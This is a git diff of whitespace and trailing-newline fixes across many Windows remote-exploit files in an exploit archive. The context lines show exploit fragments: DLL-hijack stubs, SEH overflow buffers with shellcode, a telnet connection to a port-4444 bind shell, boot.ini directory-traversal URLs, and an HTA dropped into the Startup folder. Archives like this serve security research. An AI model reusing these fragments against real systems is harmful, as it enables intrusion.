index 6c4f5d390..173e916ee 100755 --- a/platforms/windows/remote/35318.c +++ b/platforms/windows/remote/35318.c @@ -15,5 +15,4 @@ int pwnme() MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/3537.py b/platforms/windows/remote/3537.py index 774cc0b0d..b40f9bc38 100755 --- a/platforms/windows/remote/3537.py +++ b/platforms/windows/remote/3537.py @@ -77,4 +77,4 @@ if __name__=="__main__": ExploitMercur(target, username, passwd) -# milw0rm.com [2007-03-21] +# milw0rm.com [2007-03-21] \ No newline at end of file diff --git a/platforms/windows/remote/35399.pl b/platforms/windows/remote/35399.pl index fb80de002..f0f6b2584 100755 --- a/platforms/windows/remote/35399.pl +++ b/platforms/windows/remote/35399.pl @@ -59,4 +59,4 @@ close (F); # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) -#=========================================================================== +#=========================================================================== \ No newline at end of file diff --git a/platforms/windows/remote/3540.py b/platforms/windows/remote/3540.py index ce31e8af7..bebdd9803 100755 --- a/platforms/windows/remote/3540.py +++ b/platforms/windows/remote/3540.py @@ -136,4 +136,4 @@ if __name__=="__main__": sys.exit(-1) ExploitMercur(target, username, passwd) -# milw0rm.com [2007-03-21] +# milw0rm.com [2007-03-21] \ No newline at end of file diff --git a/platforms/windows/remote/3541.pl b/platforms/windows/remote/3541.pl index 21387b52d..eccb31d24 100755 --- a/platforms/windows/remote/3541.pl +++ b/platforms/windows/remote/3541.pl @@ -107,4 +107,4 @@ else } # __END_CODE -# milw0rm.com [2007-03-22] +# milw0rm.com [2007-03-22] \ No newline at end of file diff --git a/platforms/windows/remote/3544.c b/platforms/windows/remote/3544.c index b47862553..e094594a7 100755 --- a/platforms/windows/remote/3544.c +++ b/platforms/windows/remote/3544.c @@ -368,4 +368,4 @@ void usage(char *argv[]) { } /****************************************************************************/ -// milw0rm.com [2007-03-22] +// milw0rm.com [2007-03-22] \ No newline at end of file diff --git a/platforms/windows/remote/35446.pl b/platforms/windows/remote/35446.pl index 147a68e29..fc5cf29ab 100755 --- a/platforms/windows/remote/35446.pl +++ b/platforms/windows/remote/35446.pl @@ -59,4 +59,4 @@ close(file); # Messas Secondary School - Ain mlilla - 04300 - Algeria # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) -#=========================================================================== +#=========================================================================== \ No newline at end of file diff --git a/platforms/windows/remote/35468.pl b/platforms/windows/remote/35468.pl index a826206ad..d56a0daf0 100755 --- a/platforms/windows/remote/35468.pl +++ b/platforms/windows/remote/35468.pl @@ -58,4 +58,4 @@ close(file); # Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) , # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) -#=========================================================================== +#=========================================================================== \ No newline at end of file diff --git a/platforms/windows/remote/35509.pl b/platforms/windows/remote/35509.pl index c23cfbd29..ac049c24c 100755 --- a/platforms/windows/remote/35509.pl +++ b/platforms/windows/remote/35509.pl @@ -110,4 +110,4 @@ close(file); # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... -#================================================================================================ +#================================================================================================ \ No newline at end of file diff --git a/platforms/windows/remote/35560.txt b/platforms/windows/remote/35560.txt index 62a863cd0..e2fcb2699 100755 --- a/platforms/windows/remote/35560.txt +++ b/platforms/windows/remote/35560.txt @@ -8,4 +8,4 @@ InstallerDlg.dll 2.6.0.445 is vulnerable; other versions may also be affected. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35560-1.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35560-2.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35560-3.rb +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35560-3.rb \ No newline at end of file diff --git a/platforms/windows/remote/35563.pl b/platforms/windows/remote/35563.pl index cd533e8c7..b586170ad 100755 --- a/platforms/windows/remote/35563.pl +++ b/platforms/windows/remote/35563.pl @@ -79,4 +79,4 @@ print "\n[+++] Creating And Download the Target File Content in KedAns.log \n"; # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... -#================================================================================================ +#================================================================================================ \ No newline at end of file diff --git a/platforms/windows/remote/3561.pl b/platforms/windows/remote/3561.pl index 1e22b135f..84a9d7079 100755 --- a/platforms/windows/remote/3561.pl +++ b/platforms/windows/remote/3561.pl @@ -114,4 +114,4 @@ sleep(3); system("telnet $host 4444"); exit; -# milw0rm.com [2007-03-24] +# milw0rm.com [2007-03-24] \ No newline at end of file diff --git a/platforms/windows/remote/35612.pl b/platforms/windows/remote/35612.pl index 37881a595..1cdb4fb07 100755 --- a/platforms/windows/remote/35612.pl +++ b/platforms/windows/remote/35612.pl @@ -104,6 +104,4 @@ my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com) my $end = "\x90" x (20000 - $nops); # Nop sled open(FILE,'>>KedAns.m3u8'); print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end; -close(FILE); - - +close(FILE); \ No newline at end of file diff --git a/platforms/windows/remote/35614.c b/platforms/windows/remote/35614.c index 40ad33719..775e805f4 100755 --- a/platforms/windows/remote/35614.c +++ b/platforms/windows/remote/35614.c @@ -60,5 +60,4 @@ BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/35652.sh b/platforms/windows/remote/35652.sh index 7b724718d..77445af40 100755 --- a/platforms/windows/remote/35652.sh +++ b/platforms/windows/remote/35652.sh @@ -22,4 +22,4 @@ echo system:getproperties sleep 1 echo exec \"$2\" sleep 1 -) | telnet +) | telnet \ No newline at end of file diff --git a/platforms/windows/remote/35686.pl b/platforms/windows/remote/35686.pl index 0ec9280ba..a0736f2fa 100755 --- a/platforms/windows/remote/35686.pl +++ b/platforms/windows/remote/35686.pl @@ -144,4 +144,4 @@ sleep(2); # # # -=cut +=cut \ No newline at end of file diff --git a/platforms/windows/remote/35694.txt b/platforms/windows/remote/35694.txt index 7793bf97c..a2d34a971 100755 --- a/platforms/windows/remote/35694.txt +++ b/platforms/windows/remote/35694.txt @@ -174,4 +174,4 @@ arg3="SkinCrafter3_vs2008"; arg4="SkinCrafter3_vs2008"; target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ); - + \ No newline at end of file diff --git a/platforms/windows/remote/3570.c b/platforms/windows/remote/3570.c index 4ea4768a3..a96b796f4 100755 --- a/platforms/windows/remote/3570.c +++ b/platforms/windows/remote/3570.c @@ -234,4 +234,4 @@ int main(int argc, char ** argv) { return 0; } -// milw0rm.com [2007-03-25] +// milw0rm.com [2007-03-25] \ No newline at end of file diff --git a/platforms/windows/remote/35714.pl b/platforms/windows/remote/35714.pl index 194c0e76f..7e607ab38 100755 --- a/platforms/windows/remote/35714.pl +++ b/platforms/windows/remote/35714.pl @@ -73,5 +73,4 @@ my $shell = my $exploit = $header.$jump.$junk.$call.$shell.$nops; open(myfile,'>>KedAns.bvp'); print myfile $exploit; -close (myfile); - +close (myfile); \ No newline at end of file diff --git a/platforms/windows/remote/3575.cpp b/platforms/windows/remote/3575.cpp index 37f30c79d..d74a89459 100755 --- a/platforms/windows/remote/3575.cpp +++ b/platforms/windows/remote/3575.cpp @@ -526,4 +526,4 @@ void logo() printf(" # ------------------------------------------------------------------- # \n"); } -// milw0rm.com [2007-03-25] +// milw0rm.com [2007-03-25] \ No newline at end of file diff --git a/platforms/windows/remote/3577.html b/platforms/windows/remote/3577.html index 96d49f637..841f4d665 100755 --- a/platforms/windows/remote/3577.html +++ b/platforms/windows/remote/3577.html @@ -146,4 +146,4 @@ function Go(){ -# milw0rm.com [2007-03-26] +# milw0rm.com [2007-03-26] \ No newline at end of file diff --git a/platforms/windows/remote/3579.py b/platforms/windows/remote/3579.py index a3b58cba1..72cb3434b 100755 --- a/platforms/windows/remote/3579.py +++ b/platforms/windows/remote/3579.py @@ -102,4 +102,4 @@ if __name__ == '__main__': ExploitFTP(target) -# milw0rm.com [2007-03-26] +# milw0rm.com [2007-03-26] \ No newline at end of file diff --git a/platforms/windows/remote/35806.c b/platforms/windows/remote/35806.c index 34fa634e4..ed105256c 100755 --- a/platforms/windows/remote/35806.c +++ b/platforms/windows/remote/35806.c @@ -166,5 +166,4 @@ int main(int argc, char *argv[]) return 1; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/35809.c b/platforms/windows/remote/35809.c index 2c40c5d68..f108695d5 100755 --- a/platforms/windows/remote/35809.c +++ b/platforms/windows/remote/35809.c @@ -84,4 +84,4 @@ BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 + ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com + andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team + # All My Friends # + -=============================================================================+ +=============================================================================+ \ No newline at end of file diff --git a/platforms/windows/remote/35864.txt b/platforms/windows/remote/35864.txt index 6c444a01d..861dd4720 100755 --- a/platforms/windows/remote/35864.txt +++ b/platforms/windows/remote/35864.txt @@ -50,4 +50,4 @@ payload << "\x90" * (4058 - shellcode.length) pack = "GET /#{payload} HTTP/1.1\r\n" pack << "Host: http://#{@ip}:#{@port}\r\n\r\n" -puts "packet sended." if send(pack) +puts "packet sended." if send(pack) \ No newline at end of file diff --git a/platforms/windows/remote/35881.c b/platforms/windows/remote/35881.c index 38d6c78d7..5371df8a9 100755 --- a/platforms/windows/remote/35881.c +++ b/platforms/windows/remote/35881.c @@ -39,5 +39,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { xAuroraPwnage(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/3589.pm b/platforms/windows/remote/3589.pm index b569a523b..67ff5229f 100755 --- a/platforms/windows/remote/3589.pm +++ b/platforms/windows/remote/3589.pm @@ -130,4 +130,4 @@ sub Exploit { 1; -# milw0rm.com [2007-03-27] +# milw0rm.com [2007-03-27] \ No newline at end of file diff --git a/platforms/windows/remote/35921.html b/platforms/windows/remote/35921.html index ea6d5f542..d2e0941da 100755 --- a/platforms/windows/remote/35921.html +++ b/platforms/windows/remote/35921.html @@ -59,5 +59,4 @@ target.ProcessRequestEx buf ,puf ' Bo0M ! # h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm # Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz #================================================================================================ ---> - +--> \ No newline at end of file diff --git a/platforms/windows/remote/35924.py b/platforms/windows/remote/35924.py index 7771f05c7..9ce50f026 100755 --- a/platforms/windows/remote/35924.py +++ b/platforms/windows/remote/35924.py @@ -169,4 +169,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/35928.html b/platforms/windows/remote/35928.html index 063e618eb..a7db592cf 100755 --- a/platforms/windows/remote/35928.html +++ b/platforms/windows/remote/35928.html @@ -22,4 +22,4 @@ target.SaveToFIle arg1,arg2 End Sub - + \ No newline at end of file diff --git a/platforms/windows/remote/35948.html b/platforms/windows/remote/35948.html index 9b82d0baa..6b2436914 100755 --- a/platforms/windows/remote/35948.html +++ b/platforms/windows/remote/35948.html @@ -269,4 +269,4 @@ function dword2str(dword){ //setTimeout(run(), 3000); - + \ No newline at end of file diff --git a/platforms/windows/remote/35949.txt b/platforms/windows/remote/35949.txt index eab4ff97e..4cb0ec068 100755 --- a/platforms/windows/remote/35949.txt +++ b/platforms/windows/remote/35949.txt @@ -86,4 +86,4 @@ deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ -Contact: office[at]vantagepoint[dot]sg +Contact: office[at]vantagepoint[dot]sg \ No newline at end of file diff --git a/platforms/windows/remote/36.c b/platforms/windows/remote/36.c index 8bc0996b6..f92fd6684 100755 --- a/platforms/windows/remote/36.c +++ b/platforms/windows/remote/36.c @@ -304,4 +304,4 @@ shellcode[i-prologuelen]; } -// milw0rm.com [2003-06-01] +// milw0rm.com [2003-06-01] \ No newline at end of file diff --git a/platforms/windows/remote/36025.py b/platforms/windows/remote/36025.py index 3f0c2f738..1e0c7457f 100755 --- a/platforms/windows/remote/36025.py +++ b/platforms/windows/remote/36025.py @@ -75,4 +75,4 @@ while i pwd ---> XPWD 257 "/C:/" is current directory. -# milw0rm.com [2004-07-22] +# milw0rm.com [2004-07-22] \ No newline at end of file diff --git a/platforms/windows/remote/3610.html b/platforms/windows/remote/3610.html index 36015ee49..af7fb1783 100755 --- a/platforms/windows/remote/3610.html +++ b/platforms/windows/remote/3610.html @@ -80,4 +80,4 @@ attack.OpenDVD(buff); -# milw0rm.com [2007-03-30] +# milw0rm.com [2007-03-30] \ No newline at end of file diff --git a/platforms/windows/remote/36145.py b/platforms/windows/remote/36145.py index 838c6b300..cfb6662b9 100755 --- a/platforms/windows/remote/36145.py +++ b/platforms/windows/remote/36145.py @@ -80,4 +80,4 @@ def main(): print"\n[*] By @rmallof" if __name__=="__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/3616.py b/platforms/windows/remote/3616.py index 1e9565113..f0f1b5e63 100755 --- a/platforms/windows/remote/3616.py +++ b/platforms/windows/remote/3616.py @@ -142,4 +142,4 @@ if __name__=="__main__": sendbind(target) ExploitLotus(target) -# milw0rm.com [2007-03-31] +# milw0rm.com [2007-03-31] \ No newline at end of file diff --git a/platforms/windows/remote/36174.txt b/platforms/windows/remote/36174.txt index d01c34dd5..86586e5fd 100755 --- a/platforms/windows/remote/36174.txt +++ b/platforms/windows/remote/36174.txt @@ -369,5 +369,4 @@ href="/viewlogfile2.html?file=monitoring_manager_2010-3-19.log&">monitoring_mana
  • statuschange_2010-3-19.log
  • watcher.log
  • -

    - +

    \ No newline at end of file diff --git a/platforms/windows/remote/36206.rb b/platforms/windows/remote/36206.rb index adb207aa7..a5db82ce4 100755 --- a/platforms/windows/remote/36206.rb +++ b/platforms/windows/remote/36206.rb @@ -147,5 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/36217.txt b/platforms/windows/remote/36217.txt index 922a63373..8b863233d 100755 --- a/platforms/windows/remote/36217.txt +++ b/platforms/windows/remote/36217.txt @@ -7,4 +7,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. POST /goform/AddGroup HTTP/1.1 -group=&privilege=4&method=1&enabled=on&ok=OK +group=&privilege=4&method=1&enabled=on&ok=OK \ No newline at end of file diff --git a/platforms/windows/remote/36218.txt b/platforms/windows/remote/36218.txt index 1c2743319..98ee8c312 100755 --- a/platforms/windows/remote/36218.txt +++ b/platforms/windows/remote/36218.txt @@ -7,4 +7,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. POST /goform/AddAccessLimit HTTP/1.1 -url=&group=test&method=3&ok=OK +url=&group=test&method=3&ok=OK \ No newline at end of file diff --git a/platforms/windows/remote/36250.html b/platforms/windows/remote/36250.html index 44ae22492..69f493f55 100755 --- a/platforms/windows/remote/36250.html +++ b/platforms/windows/remote/36250.html @@ -28,4 +28,4 @@ for (i=0; i<6666; i++) { obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh); } window.location.href = window.location.href; - + \ No newline at end of file diff --git a/platforms/windows/remote/3627.c b/platforms/windows/remote/3627.c index 4767f1353..396e68a78 100755 --- a/platforms/windows/remote/3627.c +++ b/platforms/windows/remote/3627.c @@ -558,4 +558,4 @@ void logo() printf(" # ------------------------------------------------------------------- # \n"); } -// milw0rm.com [2007-04-01] +// milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/3634.txt b/platforms/windows/remote/3634.txt index aface4b96..f34bafb6f 100755 --- a/platforms/windows/remote/3634.txt +++ b/platforms/windows/remote/3634.txt @@ -23,4 +23,4 @@ invokes calc.exe if successful https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) -# milw0rm.com [2007-04-01] +# milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/3635.txt b/platforms/windows/remote/3635.txt index a8af055a6..4c5750aea 100755 --- a/platforms/windows/remote/3635.txt +++ b/platforms/windows/remote/3635.txt @@ -24,4 +24,4 @@ greets: used SkyLined's idea of exploitation. tnx to him. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3635.zip (04012007-ani.zip) -# milw0rm.com [2007-04-01] +# milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/3636.txt b/platforms/windows/remote/3636.txt index 927bd1d53..f94d9f805 100755 --- a/platforms/windows/remote/3636.txt +++ b/platforms/windows/remote/3636.txt @@ -24,4 +24,4 @@ invokes calc.exe if successful https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3636.zip (04012007-exp.zip) -# milw0rm.com [2007-04-01] +# milw0rm.com [2007-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/36376.txt b/platforms/windows/remote/36376.txt index d0555d0f3..12e630f33 100755 --- a/platforms/windows/remote/36376.txt +++ b/platforms/windows/remote/36376.txt @@ -8,5 +8,4 @@ http://www.example.com/..\..\..\boot.ini http://www.example.com/..\\..\\..\\boot.ini http://www.example.com/..\/..\/..\/boot.ini http://www.example.com//..\/..\/..\boot.ini -http://www.example.com/.\..\.\..\.\..\boot.ini - +http://www.example.com/.\..\.\..\.\..\boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/36477.py b/platforms/windows/remote/36477.py index 1c7629ca3..8a24b1529 100755 --- a/platforms/windows/remote/36477.py +++ b/platforms/windows/remote/36477.py @@ -61,4 +61,4 @@ print(('[*] Sending the payload second time', addr)) c.recv(1024) c.send(response) c.close() -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/36491.txt b/platforms/windows/remote/36491.txt index b7dd860c6..c1e6ad4fd 100755 --- a/platforms/windows/remote/36491.txt +++ b/platforms/windows/remote/36491.txt @@ -8,4 +8,4 @@ Reference: http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/ http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html -https://helpx.adobe.com/security/products/flash-player/apsa15-02.html +https://helpx.adobe.com/security/products/flash-player/apsa15-02.html \ No newline at end of file diff --git a/platforms/windows/remote/3650.c b/platforms/windows/remote/3650.c index 20e4ca364..2e5af2918 100755 --- a/platforms/windows/remote/3650.c +++ b/platforms/windows/remote/3650.c @@ -603,4 +603,4 @@ void logo() printf(" # ------------------------------------------------------------------- # \n"); } -// milw0rm.com [2007-04-02] +// milw0rm.com [2007-04-02] \ No newline at end of file diff --git a/platforms/windows/remote/3651.txt b/platforms/windows/remote/3651.txt index 322158a86..06a81733b 100755 --- a/platforms/windows/remote/3651.txt +++ b/platforms/windows/remote/3651.txt @@ -12,4 +12,4 @@ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3651.tar.gz (04032007-ie_ani.tar.gz) -# milw0rm.com [2007-04-03] +# milw0rm.com [2007-04-03] \ No newline at end of file diff --git a/platforms/windows/remote/36517.html b/platforms/windows/remote/36517.html index 4c990e032..23691ef85 100755 --- a/platforms/windows/remote/36517.html +++ b/platforms/windows/remote/36517.html @@ -81,4 +81,4 @@ fbuff = buff1 + nseh + seh + nops + sc + buff2; ssac.StopSiteAllChannel(fbuff); - + \ No newline at end of file diff --git a/platforms/windows/remote/36518.html b/platforms/windows/remote/36518.html index d551b0803..08ced7fa0 100755 --- a/platforms/windows/remote/36518.html +++ b/platforms/windows/remote/36518.html @@ -88,4 +88,4 @@ fbuff = buff1 + nseh + seh + nops + sc + buff2; getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4); - + \ No newline at end of file diff --git a/platforms/windows/remote/36519.html b/platforms/windows/remote/36519.html index a8a821d5f..02ca34ad1 100755 --- a/platforms/windows/remote/36519.html +++ b/platforms/windows/remote/36519.html @@ -79,4 +79,4 @@ fbuff = buff1 + nseh + seh + nops + sc + buff2; sname.SiteName(fbuff) = buff2; - + \ No newline at end of file diff --git a/platforms/windows/remote/36602.html b/platforms/windows/remote/36602.html index 33c79600d..2819981cd 100755 --- a/platforms/windows/remote/36602.html +++ b/platforms/windows/remote/36602.html @@ -85,4 +85,4 @@ fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.ChangePassword(fbuff ,arg2); - + \ No newline at end of file diff --git a/platforms/windows/remote/36603.html b/platforms/windows/remote/36603.html index ea720d36e..718d6e24c 100755 --- a/platforms/windows/remote/36603.html +++ b/platforms/windows/remote/36603.html @@ -84,4 +84,4 @@ fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.AudioOnlySiteChannel(fbuff ,arg2 ) = arg3 - + \ No newline at end of file diff --git a/platforms/windows/remote/36604.html b/platforms/windows/remote/36604.html index 8e2348c37..9df3439de 100755 --- a/platforms/windows/remote/36604.html +++ b/platforms/windows/remote/36604.html @@ -85,4 +85,4 @@ fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.PlaySiteAllChannel(fbuff) - + \ No newline at end of file diff --git a/platforms/windows/remote/36606.html b/platforms/windows/remote/36606.html index daa1f6848..712bcd65c 100755 --- a/platforms/windows/remote/36606.html +++ b/platforms/windows/remote/36606.html @@ -87,4 +87,4 @@ fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.SiteChannel(fbuff ,arg2 ) = arg3; - + \ No newline at end of file diff --git a/platforms/windows/remote/36607.html b/platforms/windows/remote/36607.html index 64205405d..8e34fb7f9 100755 --- a/platforms/windows/remote/36607.html +++ b/platforms/windows/remote/36607.html @@ -86,4 +86,4 @@ fbuff = arg3 + nseh + seh + nops + shellcode + buff2; target.Connect(arg1, arg2, fbuff ,arg4); - + \ No newline at end of file diff --git a/platforms/windows/remote/3661.pl b/platforms/windows/remote/3661.pl index f3d674a90..54a59fc2f 100755 --- a/platforms/windows/remote/3661.pl +++ b/platforms/windows/remote/3661.pl @@ -109,4 +109,4 @@ sub convert_shellcode { return $code; } -# milw0rm.com [2007-04-04] +# milw0rm.com [2007-04-04] \ No newline at end of file diff --git a/platforms/windows/remote/3662.rb b/platforms/windows/remote/3662.rb index ffe038c5a..430a99335 100755 --- a/platforms/windows/remote/3662.rb +++ b/platforms/windows/remote/3662.rb @@ -121,4 +121,4 @@ end end -# milw0rm.com [2007-04-04] +# milw0rm.com [2007-04-04] \ No newline at end of file diff --git a/platforms/windows/remote/3675.rb b/platforms/windows/remote/3675.rb index 60153b681..0f793f06b 100755 --- a/platforms/windows/remote/3675.rb +++ b/platforms/windows/remote/3675.rb @@ -91,4 +91,4 @@ system(command) ftp.close -# milw0rm.com [2007-04-06] +# milw0rm.com [2007-04-06] \ No newline at end of file diff --git a/platforms/windows/remote/36880.rb b/platforms/windows/remote/36880.rb index cbbb8e621..75b9b05cf 100755 --- a/platforms/windows/remote/36880.rb +++ b/platforms/windows/remote/36880.rb @@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote swf end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/36932.py b/platforms/windows/remote/36932.py index 728560a24..6cfb9f55f 100755 --- a/platforms/windows/remote/36932.py +++ b/platforms/windows/remote/36932.py @@ -92,4 +92,4 @@ def main(): pwn4ge(SERV_ADDR, int(SERV_PORT)) if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/36984.py b/platforms/windows/remote/36984.py index 24e0e33dd..0c7d9df77 100755 --- a/platforms/windows/remote/36984.py +++ b/platforms/windows/remote/36984.py @@ -79,5 +79,4 @@ buffer += shellcode f = open("evil.txt", "wb") f.write(buffer) -f.close() - +f.close() \ No newline at end of file diff --git a/platforms/windows/remote/37.pl b/platforms/windows/remote/37.pl index bbe8501df..b99436554 100755 --- a/platforms/windows/remote/37.pl +++ b/platforms/windows/remote/37.pl @@ -81,4 +81,4 @@ END_DATA close($server); -# milw0rm.com [2003-06-07] +# milw0rm.com [2003-06-07] \ No newline at end of file diff --git a/platforms/windows/remote/37165.py b/platforms/windows/remote/37165.py index ab073f9e3..2b354b9b0 100755 --- a/platforms/windows/remote/37165.py +++ b/platforms/windows/remote/37165.py @@ -153,5 +153,4 @@ try: out_file.close() print("[*] Malicious txt file created successfully") except: - print "[!] Error creating file" - + print "[!] Error creating file" \ No newline at end of file diff --git a/platforms/windows/remote/3728.c b/platforms/windows/remote/3728.c index 1b604d567..b94346e81 100755 --- a/platforms/windows/remote/3728.c +++ b/platforms/windows/remote/3728.c @@ -172,4 +172,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2007-04-13] +// milw0rm.com [2007-04-13] \ No newline at end of file diff --git a/platforms/windows/remote/3737.py b/platforms/windows/remote/3737.py index 0b5f5050f..b77b2bcdf 100755 --- a/platforms/windows/remote/3737.py +++ b/platforms/windows/remote/3737.py @@ -108,4 +108,4 @@ if __name__ == '__main__': time.sleep(3) ConnectRemoteShell(target) -# milw0rm.com [2007-04-15] +# milw0rm.com [2007-04-15] \ No newline at end of file diff --git a/platforms/windows/remote/3738.php b/platforms/windows/remote/3738.php index 4e1ef793d..5a05d30cf 100755 --- a/platforms/windows/remote/3738.php +++ b/platforms/windows/remote/3738.php @@ -221,4 +221,4 @@ $out=explode("_delim_",$html); echo $out[1]; ?> -# milw0rm.com [2007-04-15] +# milw0rm.com [2007-04-15] \ No newline at end of file diff --git a/platforms/windows/remote/3740.c b/platforms/windows/remote/3740.c index e2f4ef221..615331e4b 100755 --- a/platforms/windows/remote/3740.c +++ b/platforms/windows/remote/3740.c @@ -190,4 +190,4 @@ int main( int argc, char **argv ) { return 0; } -// milw0rm.com [2007-04-15] +// milw0rm.com [2007-04-15] \ No newline at end of file diff --git a/platforms/windows/remote/3746.txt b/platforms/windows/remote/3746.txt index 2cc7d420e..51c82e98c 100755 --- a/platforms/windows/remote/3746.txt +++ b/platforms/windows/remote/3746.txt @@ -54,4 +54,4 @@ http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3746.zip (04172007-dnsxpl.v2.1.zip) -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/windows/remote/37510.c b/platforms/windows/remote/37510.c index cbe5dda3c..ca277dca8 100755 --- a/platforms/windows/remote/37510.c +++ b/platforms/windows/remote/37510.c @@ -23,5 +23,4 @@ Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 2 { hijack_poc () ; return 0 ; - } - + } \ No newline at end of file diff --git a/platforms/windows/remote/37542.html b/platforms/windows/remote/37542.html index 8d6f1f996..6b568ec75 100755 --- a/platforms/windows/remote/37542.html +++ b/platforms/windows/remote/37542.html @@ -21,4 +21,4 @@ progid = "BARCODEWIZLib.BarCodeWiz" argCount = 1 arg1=String(14356, "A") poc.Barcode = arg1 - + \ No newline at end of file diff --git a/platforms/windows/remote/37655.c b/platforms/windows/remote/37655.c index be5510a24..b6e5a5bd3 100755 --- a/platforms/windows/remote/37655.c +++ b/platforms/windows/remote/37655.c @@ -14,5 +14,4 @@ int exp() WinExec("calc", 0); exit(0); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/37668.php b/platforms/windows/remote/37668.php index cb9800d5b..cdcce3407 100755 --- a/platforms/windows/remote/37668.php +++ b/platforms/windows/remote/37668.php @@ -231,4 +231,4 @@ } - ?> + ?> \ No newline at end of file diff --git a/platforms/windows/remote/37729.py b/platforms/windows/remote/37729.py index 79d190351..8413dc02f 100755 --- a/platforms/windows/remote/37729.py +++ b/platforms/windows/remote/37729.py @@ -256,5 +256,4 @@ if __name__=='__main__': ftp.start() print 'On', local_ip, ':', local_port raw_input('Enter to end...\n') - ftp.stop() - + ftp.stop() \ No newline at end of file diff --git a/platforms/windows/remote/37731.py b/platforms/windows/remote/37731.py index 81037c968..48d135af4 100755 --- a/platforms/windows/remote/37731.py +++ b/platforms/windows/remote/37731.py @@ -52,4 +52,4 @@ s.recv(1024) s.send('PUT ' + evil + '\r\n') s.recv(1024) s.send('QUIT\r\n') -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/378.pl b/platforms/windows/remote/378.pl index 776f04db6..a7edda738 100755 --- a/platforms/windows/remote/378.pl +++ b/platforms/windows/remote/378.pl @@ -111,4 +111,4 @@ if (/$repcode/) { last; } return $res; } -# milw0rm.com [2004-08-05] +# milw0rm.com [2004-08-05] \ No newline at end of file diff --git a/platforms/windows/remote/37808.py b/platforms/windows/remote/37808.py index c42a67b46..27c075923 100755 --- a/platforms/windows/remote/37808.py +++ b/platforms/windows/remote/37808.py @@ -90,4 +90,4 @@ print "[*] 